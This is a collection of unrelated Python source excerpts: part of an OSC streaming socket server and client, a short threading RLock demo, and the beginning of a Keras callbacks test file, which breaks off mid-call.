sent += tmp
return True
def _transmitMsg(self, msg):
"""Send an OSC message over a streaming socket. Raises exception if it
should fail. If everything is transmitted properly, True is returned. If
socket has been closed, False.
"""
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
# vim:noexpandtab
|
thread_RLock.py
|
import threading
import time
# 说白了就是在一个大锁中还要再包含子锁
def run1():
print("grab the first part data")
lock.acquire()
global num
num += 1
lock.release()
return num
def run2():
print("grab the second part data")
lock.acquire()
global num2
num2 += 1
lock.release()
return num2
def run3():
lock.acquire()
res = run1()
print('--------between run1 and run2-----')
res2 = run2()
lock.release()
print(res, res2)
if __name__ == '__main__':
num, num2 = 0, 0
lock = threading.RLock()
for i in range(10):
t = threading.Thread(target=run3)
t.start()
while threading.active_count() != 1:
print('threading.active_count = ', threading.active_count())
else:
print('----all threads done---')
print(num, num2)
print("---- main end ----")
|
callbacks_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import collections
import csv
import json
import os
import re
import shutil
import sys
import threading
import time
import unittest
from absl.testing import parameterized
import numpy as np
import keras
from keras import keras_parameterized
from keras import testing_utils
from keras.engine import sequential
from keras.layers import Activation
from keras.layers import Dense
from keras.optimizer_v2 import gradient_descent
from keras.optimizer_v2 import learning_rate_schedule
from keras.utils import np_utils
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import checkpoint_management
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
"""Counts the number of times each callback method was run.
Attributes:
method_counts: dict. Contains the counts of time each callback method was
run.
"""
def __init__(self):
self.method_counts = collections.defaultdict(int)
methods_to_count = [
'on_batch_begin', 'on_batch_end', 'on_epoch_begin', 'on_epoch_end',
'on_predict_batch_begin', 'on_predict_batch_end', 'on_predict_begin',
'on_predict_end', 'on_test_batch_begin', 'on_test_batch_end',
'on_test_begin', 'on_test_end', 'on_train_batch_begin',
'on_train_batch_end', 'on_train_begin', 'on_train_end'
]
for method_name in methods_to_count:
setattr(self, method_name,
self.wrap_with_counts(method_name, getattr(self, method_name)))
def wrap_with_counts(self, method_name, method):
def _call_and_count(*args, **kwargs):
self.method_counts[method_name] += 1
return method(*args, **kwargs)
return _call_and_count
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
class MySequence(keras.utils.data_utils.Sequence):
def __getitem__(self, _):
return np.ones((2, 10)), np.ones((2, 1))
def __len__(self):
return 5
return MySequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
def _check_counts(self, counter, expected_counts):
"""Checks that the counts registered by `counter` are those expected."""
for method_name, expected_count in expected_counts.items():
self.assertEqual(
counter.method_counts[method_name],
expected_count,
msg='For method {}: expected {}, got: {}'.format(
method_name, expected_count, counter.method_counts[method_name]))
def _get_model(self):
layers = [
keras.layers.Dense(10, activation='relu'),
keras.layers.Dense(1, activation='sigmoid')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
tf.compat.v1.train.AdamOptimizer(0.001),
'binary_crossentropy',
run_eagerly=testing_utils.should_run_eagerly())
return model
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_fit(self, data):
if not tf.executing_eagerly():
self.skipTest('Behavior changed in v2.')
x, y = data
val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
model = self._get_model()
counter = Counter()
model.fit(
x,
y,
validation_data=(val_x, val_y),
batch_size=2,
steps_per_epoch=5,
epochs=5,
callbacks=[counter])
self._check_counts(
counter, {
'on_batch_begin': 25,
'on_batch_end': 25,
'on_epoch_begin': 5,
'on_epoch_end': 5,
'on_predict_batch_begin': 0,
'on_predict_batch_end': 0,
'on_predict_begin': 0,
'on_predict_end': 0,
'on_test_batch_begin': 10,
'on_test_batch_end': 10,
'on_test_begin': 5,
'on_test_end': 5,
'on_train_batch_begin': 25,
'on_train_batch_end': 25,
'on_train_begin': 1,
'on_train_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_evaluate(self, data):
x, y = data
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.evaluate(
x,
y,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_test_batch_begin': 5,
'on_test_batch_end': 5,
'on_test_begin': 1,
'on_test_end': 1
})
@parameterized.named_parameters(('with_numpy', _get_numpy()),
('with_sequence', _get_sequence()))
def test_callback_hooks_are_called_in_predict(self, data):
x = data[0]
is_sequence = isinstance(x, keras.utils.data_utils.Sequence)
model = self._get_model()
counter = Counter()
model.predict(
x,
batch_size=2 if not is_sequence else None,
steps=5 if is_sequence else None,
callbacks=[counter])
self._check_counts(
counter, {
'on_predict_batch_begin': 5,
'on_predict_batch_end': 5,
'on_predict_begin': 1,
'on_predict_end': 1
})
def test_callback_list_methods(self):
counter = Counter()
callback_list = keras.callbacks.CallbackList([counter])
batch = 0
callback_list.on_test_batch_begin(batch)
callback_list.on_test_batch_end(batch)
callback_list.on_predict_batch_begin(batch)
callback_list.on_predict_batch_end(batch)
self._check_counts(
counter, {
'on_test_batch_begin': 1,
'on_test_batch_end': 1,
'on_predict_batch_begin': 1,
'on_predict_batch_end': 1
})
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_all_keras_modes
def test_callback_warning(self):
class SleepCallback(keras.callbacks.Callback):
def on_train_batch_end(self, batch, logs=None):
time.sleep(0.1)
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1,
callbacks=[SleepCallback()])
warning_msg = ('Callback method `on_train_batch_end` is slow compared '
'to the batch time')
self.assertIn(warning_msg, '\n'.join(warning_messages))
@keras_parameterized.run_all_keras_modes
def test_default_callbacks_no_warning(self):
# Test that without the callback no warning is raised
model = sequential.Sequential()
model.add(keras.layers.Dense(1))
model.compile(
'sgd',
loss='mse',
run_eagerly=testing_utils.should_run_eagerly())
warning_messages = []
def warning(msg):
warning_messages.append(msg)
with tf.compat.v1.test.mock.patch.object(logging, 'warning', warning):
model.fit(
np.ones((16, 1), 'float32'),
np.ones((16, 1), 'float32'),
batch_size=3,
epochs=1)
self.assertListEqual(warning_messages, [])
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = tf.ones((200, 3))
y = tf.zeros((200, 2))
dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_validation_data(self):
model = self._get_model(input_shape=(3,))
x = tf.ones((50, 3))
y = tf.zeros((50, 2))
training_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
val_dataset = tf.data.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*5/5.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(training_dataset, epochs=2, validation_data=val_dataset)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_validation_split(self):
model = self._get_model(input_shape=(3,))
x = np.ones((100, 3))
y = np.zeros((100, 2))
expected_log = (
r'(?s).*1/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*8/8.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x, y, batch_size=10, epochs=2, validation_split=0.2)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_training_validation(self):
model = self._get_model(input_shape=(2,))
def generator():
for _ in range(100):
yield [1, 1], 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2) \
.repeat()
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
expected_log = (
r'(?s).*1/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:'
r'.*2/2.*20/20.*- loss:.*- my_acc:.*- val_loss:.*- val_my_acc:.*')
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(
x=training, validation_data=validation, epochs=2, steps_per_epoch=20)
self.assertRegex(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_progbar_logging_with_dataset_and_partial_batch(self):
model = self._get_model(input_shape=(2,))
def generator():
# Have a partial batch at the end.
for _ in range(9):
yield np.random.random(2), 1
training = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
validation = tf.data.Dataset \
.from_generator(
generator=generator,
output_types=('float64', 'float64'),
output_shapes=([2], [])) \
.batch(2)
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(x=training, validation_data=validation)
# Make sure the value of val_ metrics are not zeros.
log_content = printed.contents()
val_loss = re.findall(r'val_loss: (\d\.\d+)', log_content)
self.assertLen(val_loss, 1)
self.assertGreater(float(val_loss[0]), 0.0)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = np_utils.to_categorical(y_test)
y_train = np_utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=15,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegex(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
# Case 9: `ModelCheckpoint` with valid and invalid `options` argument.
with self.assertRaisesRegex(TypeError, 'tf.train.CheckpointOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.saved_model.SaveOptions())
with self.assertRaisesRegex(TypeError, 'tf.saved_model.SaveOptions'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=True,
mode=mode,
options=tf.train.CheckpointOptions())
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
save_weights_only=False,
mode=mode,
options=tf.saved_model.SaveOptions())
def _get_dummy_resource_for_model_checkpoint_testing(self):
def get_input_datasets():
# Simple training input.
train_input = [[1.]] * 16
train_label = [[0.]] * 16
ds = tf.data.Dataset.from_tensor_slices((train_input, train_label))
return ds.batch(8, drop_remainder=True)
# Very simple bias model to eliminate randomness.
optimizer = gradient_descent.SGD(0.1)
model = sequential.Sequential()
model.add(testing_utils.Bias(input_shape=(1,)))
model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
train_ds = get_input_datasets()
temp_dir = self.get_temp_dir()
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
# The filepath shouldn't exist at the beginning.
self.assertFalse(os.path.exists(filepath))
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath, save_weights_only=True)
return model, train_ds, callback, filepath
def _run_load_weights_on_restart_test_common_iterations(self):
(model, train_ds, callback,
filepath) = self._get_dummy_resource_for_model_checkpoint_testing()
initial_epochs = 3
model.fit(train_ds, epochs=initial_epochs, callbacks=[callback])
# The files should exist after fitting with callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
self.assertFalse(os.path.exists(filepath.format(epoch=initial_epochs + 1)))
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=initial_epochs))
model.fit(train_ds, epochs=1)
weights_after_one_more_epoch = model.get_weights()
# The filepath should continue to exist after fitting without callback.
for epoch in range(initial_epochs):
self.assertTrue(os.path.exists(filepath.format(epoch=epoch + 1)))
return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
def func(self):
(model, train_ds, filepath, weights_after_one_more_epoch
) = self._run_load_weights_on_restart_test_common_iterations()
# Sleep for some short time period ensuring the files are created with
# a different time (in MacOS OSS the granularity is only 1 second).
time.sleep(2)
callback = keras.callbacks.ModelCheckpoint(
filepath=filepath,
save_weights_only=save_weights_only,
load_weights_on_restart=True)
model.fit(train_ds, epochs=1, callbacks=[callback])
weights_after_model_restoring_and_one_more_epoch = model.get_weights()
self.assertEqual(
callback._get_most_recently_modified_file_matching_pattern(filepath),
filepath.format(epoch=1))
model.fit(
train_ds,
epochs=1,
callbacks=[
keras.callbacks.ModelCheckpoint(
